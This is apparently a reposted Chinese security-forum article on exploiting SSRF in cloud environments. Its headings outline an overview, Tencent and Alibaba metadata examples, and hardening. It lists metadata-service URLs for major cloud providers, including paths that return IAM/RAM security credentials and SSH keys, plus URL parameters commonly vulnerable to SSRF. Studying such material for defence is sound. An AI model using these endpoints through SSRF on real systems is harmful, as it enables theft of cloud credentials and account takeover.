由于云厂商提供云服务均使用同一套网络边界和鉴权系统,且各云组件默认相互信任。此时一旦存在SSRF漏洞,此类边界将不复存在,攻击者可直接调用云厂商支持环境中的相应接口,因此SSRF漏洞在云环境中更具有危害性。以下文章围绕ssrf的云上利用展开。
文章作者:奇安信攻防社区(中铁13层打工人)
文章来源:https://forum.butian.net/share/2412
1►
漏洞概述
2►
漏洞实例-SSRF读取TX元数据
3►
SSRF读取阿里云元数据
4►
加固与防御
5►
拓展
1、AWS( http://169.254.169.254/latest/meta-data/)
http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categorieshttp://169.254.169.254/latest/meta-data/iam/security-credentials/dummyhttp://169.254.169.254/latest/user-datahttp://169.254.169.254/latest/user-data/iam/security-credentials/[ROLENAME]http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLENAME]http://169.254.169.254/latest/meta-data/public-keys/0/openssh-keyhttp://169.254.169.254/latest/meta-data/public-keys/[ID]/openssh-key
https://cloud.google.com/compute/docs/metadataRequires theheader "Metadata-Flavor: Google" or "X-Google-Metadata-Request:True" on API v1http://169.254.169.254/computeMetadata/v1/http://metadata.google.internal/computeMetadata/v1/http://metadata/computeMetadata/v1/http://metadata.google.internal/computeMetadata/v1/instance/hostnamehttp://metadata.google.internal/computeMetadata/v1/instance/idhttp://metadata.google.internal/computeMetadata/v1/project/project-id
https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-serviceHeader:"Metadata: true"(Old)https://azure.microsoft.com/en-us/blog/what-just-happened-to-my-vm-in-vm-metadata-service/http://169.254.169.254/metadata/instance?api-version=2017-04-02http://169.254.169.254/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02&format=text
https://docs.us-phoenix-1.oraclecloud.com/Content/Compute/Tasks/gettingmetadata.htmhttp://169.254.169.254/opc/v1/instance/https://docs.oracle.com/en/cloud/iaas/compute-iaas-cloud/stcsg/retrieving-instance-metadata.htmlhttp://192.0.0.192/latest/http://192.0.0.192/latest/user-data/http://192.0.0.192/latest/meta-data/http://192.0.0.192/latest/attributes/
https://help.aliyun.com/zh/ecs/user-guide/view-instance-metadatahttp://100.100.100.200/latest/meta-data/[metadata](http://100.100.100.200/latest/meta-data/%3cmetadata)http://100.100.100.200/latest/meta-data/instance-idhttp://100.100.100.200/latest/meta-data/ram/security-credentials/http://100.100.100.200/latest/meta-data/ram/security-credentials/huocorp-terraform-goat-role
https://cloud.tencent.com/document/product/213/4934http://metadata.tencentyun.com/latest/meta-data/http://169.254.0.23/latest/meta-data/http://100.88.222.5/
https://support.huaweicloud.com/usermanual-ecs/ecs_03_0166.htmlhttp://169.254.169.254/openstack/latest/meta_data.jsonhttp://169.254.169.254/openstack/latest/user_datahttp://169.254.169.254/openstack/latest/network_data.jsonhttp://169.254.169.254/openstack/latest/securitykey
二、ssrf挖掘常见场景、参数
常见场景:
http://share.xxx.com/index.php?url=http://www.xxx.comhttp://image.xxx.com/image.php?image=http://www.xxx.com常见参数:
share、wap、url、link、src、source、target、u、3g、display、sourceURl、imageURL、domin黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!
如侵权请私聊我们删文
END
原文始发于微信公众号(黑白之道):云上的ssrf利用
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论